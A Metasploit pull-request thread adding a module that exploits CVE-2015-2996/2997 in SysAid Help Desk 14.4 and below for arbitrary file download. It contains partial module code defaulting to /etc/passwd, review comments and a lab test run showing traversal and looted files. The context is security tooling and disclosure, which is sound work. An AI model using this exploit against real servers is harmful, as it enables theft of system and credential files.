### PR TITLE
Create exploit for CVE-2015-2996/7 (arbitrary file download)

### PR DESCRIPTION
**Pull request by pedrib**
This pull request creates a module which exploits two vulnerabilities n SysAid Help Desk 14.4 and below to download arbitrary files. This module has been tested on Windows and Linux.

### CODE REVIEW

File: modules/auxiliary/admin/http/sysaid_file_download.rb [hunk 1]
```diff
@@ -0,0 +1,150 @@
...
+          [ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/generic/sysaid-14.4-multiple-vulns.txt' ],
+          [ 'URL', 'TODO_FULLDISC_URL' ]
+        ],
+      'DisclosureDate' => 'Jun 3 2015'))
+
+    register_options(
+      [
+        OptPort.new('RPORT', [true, 'The target port', 8080]),
+        OptString.new('TARGETURI', [ true,  "SysAid path", '/sysaid']),
+        OptString.new('FILEPATH', [false, 'Path of the file to download (escape Windows paths with 4 back slashes)', '/etc/passwd']),
```
Comment (void-in) [inline modules/auxiliary/admin/http/sysaid_file_download.rb]: Need to confirm from @wchen-r7. The Windows file path needs to be escaped just once (two slashes) and not twice (four slashes).

Comment (wchen-r7) [inline modules/auxiliary/admin/http/sysaid_file_download.rb]: Ah this, yeah a double-slash should be one slash. For example, here I have this OptString datastore option:

```
msf auxiliary(test) > show options

Module options (auxiliary/admin/http/test):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   Some_option                   no        Test
```

Notice what I set it with a double-slash, it's converted to a single slash:

```
msf auxiliary(test) > set Some_option C:\\test.txt
Some_option => C:\test.txt
```

And when I print_status it:

```
msf auxiliary(test) > run

[*] C:\test.txt
```

So double-slash should be it.

File: modules/auxiliary/admin/http/sysaid_file_download.rb [hunk 2]
```diff
@@ -0,0 +1,150 @@
...
+      'Author' =>
+        [
+          'Pedro Ribeiro <pedrib[at]gmail.com>' # Vulnerability discovery and MSF module
+        ],
+      'License' => MSF_LICENSE,
+      'References' =>
+        [
+          [ 'CVE', '2015-2996' ],
+          [ 'CVE', '2015-2997' ],
+          [ 'OSVDB', 'TODO' ],
```
Comment (void-in) [inline modules/auxiliary/admin/http/sysaid_file_download.rb]: Please see https://github.com/rapid7/metasploit-framework/pull/5474#issuecomment-108731648

**Comment by wchen-r7** [comment]
Delayed label applied. [Author pinged](https://github.com/rapid7/metasploit-framework/pull/5473#issuecomment-112560324).

**Comment by pedrib** [comment]
Changes made as requested!

**Comment by jvazquez-r7** [comment]
I'm downloading the beta from the home page. If the beta isn't vulnerable anymore would be nice if you could provide us with installer URL if available or just a PCAP for verification (without SSL pls, otherwise a ssl capable proxy would be good enough :))

File: modules/auxiliary/admin/http/sysaid_file_download.rb [hunk 3]
```diff
@@ -0,0 +1,148 @@
...
+      print_error("#{peer} - Could not connect.")
+      return
+    end
+  end
+
+
+  def run
+    # No point to continue if filepath is not specified
+    if datastore['FILEPATH'].nil? || datastore['FILEPATH'].empty?
+      print_error("Please supply the path of the file you want to download.")
```
Comment (jvazquez-r7) [inline modules/auxiliary/admin/http/sysaid_file_download.rb]: Use fail_with instead of print_error /return

**Comment by pedrib** [comment]
@jvazquez-r7 I've uploaded the vulnerable version to dropbox:
https://www.dropbox.com/s/fbkydxrcbfl9j0y/SysAidServer64.exe?dl=0 (Windows)
https://www.dropbox.com/s/k0zr201ef1kfts3/sysaid-server-linux.tar.gz?dl=0 (Linux)

These are the vulnerable 14.2 version. Let me know if you need anything else!

**Comment by jvazquez-r7** [comment]
Thanks @pedrib , landed after code cleanup, see final result here: https://github.com/rapid7/metasploit-framework/commit/869ac87b6439a45b57247180caaec8ad0b4d7e38

Test:

```
msf auxiliary(sysaid_file_download) > workspace -a sysraid
[*] Added workspace: sysraid
msf auxiliary(sysaid_file_download) > run

[*] 172.16.158.131:8080 - Downloading file c:\users\desktop.ini
[*] 172.16.158.131:8080 - Trying to find out the traversal path...
[-] 172.16.158.131:8080 - Could not get traversal path, using bruteforce to download the file
[+] File saved in: /Users/jvazquez/.msf4/loot/20150717114853_sysraid_172.16.158.131_sysaid.http_706160.ini
[*] Auxiliary module execution completed
msf auxiliary(sysaid_file_download) > loot

Loot
====

host            service  type         name                  content                   info  path
----            -------  ----         ----                  -------                   ----  ----
172.16.158.131           sysaid.http  c:\users\desktop.ini  application/octet-stream        /Users/jvazquez/.msf4/loot/20150717114853_sysraid_172.16.158.131_sysaid.http_706160.ini

msf auxiliary(sysaid_file_download) > cat /Users/jvazquez/.msf4/loot/20150717114853_sysraid_172.16.158.131_sysaid.http_706160.ini
[*] exec: cat /Users/jvazquez/.msf4/loot/20150717114853_sysraid_172.16.158.131_sysaid.http_706160.ini

��
[.ShellClassInfo]
LocalizedResourceName=@%SystemRoot%\system32\shell32.dll,-21813
```

**Comment by pedrib** [comment]
@jvazquez-r7 thanks a lot for your help!!

**Pull request merged**